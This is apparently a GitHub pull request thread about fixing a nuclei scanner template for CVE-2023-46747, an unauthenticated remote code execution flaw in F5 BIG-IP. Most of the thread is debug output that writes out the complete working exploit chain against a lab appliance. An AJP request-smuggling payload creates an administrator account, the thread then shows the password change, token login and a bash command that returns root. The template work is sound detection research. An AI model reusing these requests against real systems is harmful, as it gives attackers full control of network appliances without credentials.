Fix CVE-2023-46747.yaml #8500
Merged
Fix CVE-2023-46747.yaml #8500
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
I have error on token variable |
|
Hello @0xorOne, I've updated the template with the Please check and let us know if the updated template works for you. Hopefully, this will solve the issue you are facing. |
|
Thanks for your reply. I found that when sending the /mgmt/tm/auth/user/{} packet through nuclei, the returned content will be 401. |
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/9HIHP
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 17:56:43 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html> |
Please add debug parameters. |
|
Why do you need to request /mgmt/tm/auth/user/{} to change the password? |
nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=1U5QN&name_before=&passwd=qUXSXxhSu3et&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
Content-Length: 7019
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Tue, 31 Oct 2023 18:15:37 GMT
F5-Login-Page: true
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: JSESSIONID=78pyut1qvoLQxqE5haROGRutLUtqehoz; Path=/tmui; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BIG-IP® - demo-f55.com (192.168.166.189)</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="expires" content="-1" />
<meta name="copyright" content="(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
<meta name="description" content="BIG-IP® Configuration Utility" />
<meta name="author" content="F5 Networks, Inc." />
<meta name="robots" content="noindex,nofollow" />
<link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" />
<link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" />
<script type="text/javascript" src="/xui/common/scripts/utility.js?"></script>
<script type="text/javascript" charset="utf-8">
// Break out of the XUI wrapper or frameset
if (window.location != window.top.location) {
window.top.location = window.location;
}
window.onload = function(e) {
// Display error modal if necessary (but don't show it if they've failed authentication
// because they just saw the message on the original page load).
// Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie)
// Also delete these state cookies if we're rebooting.
var authCookieExists = false;
//Delete partition & folder cookies, no matter what the situation, to handle cases
// where the user's folder/partition permissions may have been changed. bug 415304
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) {
deleteStatefulCookies();
}
// Reboot
if (window.location.pathname.indexOf('reboot') != -1) {
frames['contentframe'].location.replace(path_rebootModal);
document.getElementById('legallink').style.display = 'none';
}
// Welcome
else {
frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp');
var loginFormObj = document.getElementById('loginform');
loginFormObj.style.display = 'block';
var msgText;
switch (getUrlValue('msgcode')) {
case "1":
msgText = 'Login failed';
break;
case "2":
msgText = 'Your credentials are no longer valid. Please log in again.';
break;
case "3":
msgText = 'You have been logged out. Please log in again.';
break;
case "4":
msgText = 'Remote authentication server unreachable; local authentication failed.';
break;
case "5":
msgText = 'Password changed successfully.';
break;
}
if (msgText) {
var msgObj = document.getElementById('message');
msgObj.style.display = 'block';
msgObj.innerHTML = msgText;
}
// Focus on username field
var usernameObj = document.getElementById('username');
usernameObj.focus();
if (usernameObj.select) {
usernameObj.select();
}
}
};
function deleteStatefulCookies() {
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
delCookie("f5_refreshpage");
delCookie("f5currenttab");
delCookie("f5formpage");
delCookie("f5mainmenuopenlist");
}
function checkFormBeforeSubmit() {
// delete any stateful cookies if the username being submitted is different than the previously logged-in user.
var enteredUsername = document.getElementById('username').value;
var previousUsername = "";
if (enteredUsername != previousUsername) {
deleteStatefulCookies();
}
return true;
}
</script>
</head>
<body>
<div id="wrapper">
<div id="window">
<div id="banner">
<div id="logo">
<!--[if gt IE 6]><!-->
<img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo">
<!--<![endif]-->
<!--[if IE 6]>
<img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo">
<![endif]-->
</div>
<h1>
BIG-IP
Configuration Utility</h1>
<h2>F5 Networks, Inc.</h2>
</div>
<div id="sidebar">
<div id="deviceinfo">
<label>Hostname</label>
<p title="demo-f55.com">demo-f55.com</p>
<label>IP Address</label>
<p title="192.168.166.189">192.168.166.189</p>
</div>
<p id="message" class="badtext"></p>
<form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;">
<label>Username</label>
<input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" />
<label>Password</label>
<input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" />
<button type="submit" tabindex="3">Log in</button>
</form>
</div>
<iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe>
</div>
<div id="copyright">(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br />
<a id="legallink"
href="tmui/login/legal.html"
target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a>
</div>
</div>
<div id="modal" style="display: none;">
<div class="overlay"></div>
<div class="content">
<p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p>
<p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p>
<button onclick="document.getElementById('modal').style.display='none';">Continue</button>
</div>
</div>
</body>
</html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/1U5QN
PATCH /mgmt/tm/auth/user/1U5QN HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic MVU1UU46cVVYU1h4aFN1M2V0
Content-Type: application/json
Accept-Encoding: gzip
{"password": "MjDWOJ3sHEYm79"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/1U5QN
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 18:15:37 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"1U5QN", "password":"MjDWOJ3sHEYm79"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 129
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:15:40 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.166.168","restOperationId":7158601,"kind":":resterrorresponse"}
[WRN] [CVE-2023-46747] Could not make http request for https://192.168.166.189: unresolved variables found: token
[INF] No results found. Better luck next time! |
|
I fixed the problem and made some more modifications, it should now work. |
The vulnerability can be detected by changing pass to password2. POST /mgmt/shared/authn/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{hex_decode(username)}}", "password":"{{password2}}"}nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=mU7ML&name_before=&passwd=YyOGqpN7Zyxs&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
Content-Length: 7019
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Tue, 31 Oct 2023 18:31:00 GMT
F5-Login-Page: true
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: JSESSIONID=A5bkD6xm5AXk0r3Cha8Bqx2pWlla5A3C; Path=/tmui; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BIG-IP® - demo-f55.com (192.168.166.189)</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="expires" content="-1" />
<meta name="copyright" content="(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
<meta name="description" content="BIG-IP® Configuration Utility" />
<meta name="author" content="F5 Networks, Inc." />
<meta name="robots" content="noindex,nofollow" />
<link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" />
<link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" />
<script type="text/javascript" src="/xui/common/scripts/utility.js?"></script>
<script type="text/javascript" charset="utf-8">
// Break out of the XUI wrapper or frameset
if (window.location != window.top.location) {
window.top.location = window.location;
}
window.onload = function(e) {
// Display error modal if necessary (but don't show it if they've failed authentication
// because they just saw the message on the original page load).
// Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie)
// Also delete these state cookies if we're rebooting.
var authCookieExists = false;
//Delete partition & folder cookies, no matter what the situation, to handle cases
// where the user's folder/partition permissions may have been changed. bug 415304
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) {
deleteStatefulCookies();
}
// Reboot
if (window.location.pathname.indexOf('reboot') != -1) {
frames['contentframe'].location.replace(path_rebootModal);
document.getElementById('legallink').style.display = 'none';
}
// Welcome
else {
frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp');
var loginFormObj = document.getElementById('loginform');
loginFormObj.style.display = 'block';
var msgText;
switch (getUrlValue('msgcode')) {
case "1":
msgText = 'Login failed';
break;
case "2":
msgText = 'Your credentials are no longer valid. Please log in again.';
break;
case "3":
msgText = 'You have been logged out. Please log in again.';
break;
case "4":
msgText = 'Remote authentication server unreachable; local authentication failed.';
break;
case "5":
msgText = 'Password changed successfully.';
break;
}
if (msgText) {
var msgObj = document.getElementById('message');
msgObj.style.display = 'block';
msgObj.innerHTML = msgText;
}
// Focus on username field
var usernameObj = document.getElementById('username');
usernameObj.focus();
if (usernameObj.select) {
usernameObj.select();
}
}
};
function deleteStatefulCookies() {
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
delCookie("f5_refreshpage");
delCookie("f5currenttab");
delCookie("f5formpage");
delCookie("f5mainmenuopenlist");
}
function checkFormBeforeSubmit() {
// delete any stateful cookies if the username being submitted is different than the previously logged-in user.
var enteredUsername = document.getElementById('username').value;
var previousUsername = "";
if (enteredUsername != previousUsername) {
deleteStatefulCookies();
}
return true;
}
</script>
</head>
<body>
<div id="wrapper">
<div id="window">
<div id="banner">
<div id="logo">
<!--[if gt IE 6]><!-->
<img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo">
<!--<![endif]-->
<!--[if IE 6]>
<img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo">
<![endif]-->
</div>
<h1>
BIG-IP
Configuration Utility</h1>
<h2>F5 Networks, Inc.</h2>
</div>
<div id="sidebar">
<div id="deviceinfo">
<label>Hostname</label>
<p title="demo-f55.com">demo-f55.com</p>
<label>IP Address</label>
<p title="192.168.166.189">192.168.166.189</p>
</div>
<p id="message" class="badtext"></p>
<form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;">
<label>Username</label>
<input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" />
<label>Password</label>
<input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" />
<button type="submit" tabindex="3">Log in</button>
</form>
</div>
<iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe>
</div>
<div id="copyright">(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br />
<a id="legallink"
href="tmui/login/legal.html"
target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a>
</div>
</div>
<div id="modal" style="display: none;">
<div class="overlay"></div>
<div class="content">
<p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p>
<p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p>
<button onclick="document.getElementById('modal').style.display='none';">Continue</button>
</div>
</div>
</body>
</html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/mU7ML
PATCH /mgmt/tm/auth/user/mU7ML HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic bVU3TUw6WXlPR3FwTjdaeXhz
Content-Type: application/json
Accept-Encoding: gzip
{"password": "UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/mU7ML
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 18:31:00 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"mU7ML", "password":"UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 129
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:02 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.166.168","restOperationId":7173213,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip
{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 138
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.166.168","restOperationId":7173267,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/mU7ML
PATCH /mgmt/tm/auth/user/mU7ML HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic bVU3TUw6WXlPR3FwTjdaeXhz
Content-Type: application/json
Accept-Encoding: gzip
{"password": "UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/mU7ML
HTTP/1.1 200 OK
Connection: close
Content-Length: 470
Allow:
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Set-Cookie: BIGIPAuthCookie=alt65Iq5DAZmNaSRGBKZgf4Bxu69NSwzKVTUgnSR; path=/; Secure; HttpOnly; SameSite=Strict
Set-Cookie: BIGIPAuthUsernameCookie=mU7ML; path=/; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"kind":"tm:auth:user:userstate","name":"mU7ML","fullPath":"mU7ML","generation":592,"selfLink":"https://localhost/mgmt/tm/auth/user/mU7ML?ver=16.1.2.1","description":"mU7ML","encryptedPassword":"$6$eU8w/fCj$nJOsAUVfz14gPObNWXYt3/Ob7uyDVvC2qzVgxccdz8O6Z4E99ndn.fjFV.43nhDBfFyy1B/mKt3DS0zVrRphj0","sessionLimit":-1,"partitionAccess":[{"name":"all-partitions","role":"admin","nameReference":{"link":"https://localhost/mgmt/tm/auth/partition/all-partitions?ver=16.1.2.1"}}]}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"mU7ML", "password":"UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 200 OK
Connection: close
Content-Length: 713
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"username":"mU7ML","loginReference":{"link":"https://localhost/mgmt/cm/system/authn/providers/local/login"},"loginProviderName":"local","token":{"token":"YTVLM4QBUL7XC5GU7V4WZPOVBA","name":"YTVLM4QBUL7XC5GU7V4WZPOVBA","userName":"mU7ML","authProviderName":"local","user":{"link":"https://localhost/mgmt/shared/authz/users/mU7ML"},"groupReferences":[],"timeout":1200,"startTime":"2023-10-31T11:31:06.060-0700","address":"192.168.166.168","partition":"[All]","generation":1,"lastUpdateMicros":1698777066060230,"expirationMicros":1698778266060000,"kind":"shared:authz:tokens:authtokenitemstate","selfLink":"https://localhost/mgmt/shared/authz/tokens/YTVLM4QBUL7XC5GU7V4WZPOVBA"},"generation":0,"lastUpdateMicros":0}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: YTVLM4QBUL7XC5GU7V4WZPOVBA
Accept-Encoding: gzip
{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash
HTTP/1.1 200 OK
Connection: close
Content-Length: 167
Allow:
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:06 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"kind":"tm:util:bash:runstate","command":"run","utilCmdArgs":"-c id","commandResult":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}
[CVE-2023-46747:word-1] [http] [critical] https://192.168.166.189/mgmt/tm/util/bash [uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n,Username:mU7ML,Password:YyOGqpN7Zyxs,Token:YTVLM4QBUL7XC5GU7V4WZPOVBA] [pass="YyOGqpN7Zyxs"] |
Hi @0xorOne, It was just in the original template in this manner, but it did not work in your situation because the 2nd request for password change did not work for you.
As I can see in the shared debug data, the updated template is working fine for you, we can now merge the changes. |
Thank you for your response. |
|
Hello @0xorOne, We appreciate your efforts in updating the template and making it more suitable, Your contribution has been truly valuable to us. Cheers! 🍻 You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again |
ritikchaddha
added
good first issue
DhiyaneshGeek
approved these changes
Oct 31, 2023
I have done that |
|
Hello experts the token is not being passed on the header . |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Template / PR Information
Template Validation
I've validated this template locally?
Additional Details (leave it blank if not applicable)
